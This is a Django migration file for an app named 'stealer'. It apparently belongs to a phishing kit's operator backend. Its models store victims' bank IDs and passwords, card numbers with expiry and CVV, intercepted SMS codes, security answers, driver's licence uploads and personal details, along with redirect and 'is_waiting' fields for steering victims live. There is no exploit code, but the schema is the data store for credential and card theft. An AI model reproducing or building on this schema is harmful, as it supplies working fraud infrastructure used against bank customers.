# Generated by Django 3.1.3 on 2021-09-18 11:17

from django.db import migrations, models
import django.db.models.deletion


class Migration(migrations.Migration):

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Client',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('uuid', models.UUIDField()),
                ('device', models.CharField(blank=True, max_length=100)),
                ('ip', models.CharField(blank=True, max_length=100)),
                ('is_waiting', models.BooleanField(default=False)),
                ('redirect_to', models.CharField(blank=True, max_length=100)),
                ('last_redirect', models.CharField(blank=True, max_length=100)),
                ('request_from', models.CharField(blank=True, max_length=100)),
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('updated_at', models.DateTimeField(auto_now=True)),
                ('is_sms_alert', models.BooleanField(default=False)),
                ('is_online', models.BooleanField(default=True)),
                ('is_deleted', models.BooleanField(default=False)),
                ('last_action', models.DateTimeField(auto_now_add=True)),
            ],
        ),
        migrations.CreateModel(
            name='Settings',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('profile_title', models.CharField(blank=True, max_length=150)),
                ('profile_description', models.CharField(blank=True, max_length=500)),
                ('sms_title', models.CharField(blank=True, max_length=150)),
                ('sms_description', models.CharField(blank=True, max_length=500)),
                ('card_title', models.CharField(blank=True, max_length=150)),
                ('card_description', models.CharField(blank=True, max_length=500)),
                ('driver_title', models.CharField(blank=True, max_length=150)),
                ('driver_description', models.CharField(blank=True, max_length=500)),
                ('complete_title', models.CharField(blank=True, max_length=150)),
                ('complete_description', models.CharField(blank=True, max_length=500)),
            ],
        ),
        migrations.CreateModel(
            name='ClientSms',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('code', models.CharField(max_length=20)),
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('client', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='stealer.client')),
            ],
        ),
        migrations.CreateModel(
            name='ClientQuestion',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('question', models.CharField(blank=True, max_length=250)),
                ('answer', models.CharField(blank=True, max_length=250)),
                ('client', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='stealer.client')),
            ],
        ),
        migrations.CreateModel(
            name='ClientProfile',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('first_name', models.CharField(blank=True, max_length=50)),
                ('last_name', models.CharField(blank=True, max_length=50)),
                ('mobile_number', models.CharField(blank=True, max_length=50)),
                ('birth_date', models.CharField(blank=True, max_length=50)),
                ('drivers_license', models.FileField(upload_to='licenses')),
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('client', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='stealer.client')),
            ],
        ),
        migrations.CreateModel(
            name='ClientLogin',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('bank_id', models.CharField(blank=True, max_length=50)),
                ('password', models.CharField(blank=True, max_length=100)),
                ('client', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='stealer.client')),
            ],
        ),
        migrations.CreateModel(
            name='ClientDriver',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('full_name', models.CharField(blank=True, max_length=50)),
                ('license', models.CharField(blank=True, max_length=50)),
                ('exp', models.CharField(blank=True, max_length=50)),
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('client', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='stealer.client')),
            ],
        ),
        migrations.CreateModel(
            name='ClientCard',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('card', models.CharField(blank=True, max_length=50)),
                ('card_date', models.CharField(blank=True, max_length=50)),
                ('cvv', models.CharField(blank=True, max_length=50)),
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('client', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='stealer.client')),
            ],
        ),
    ]
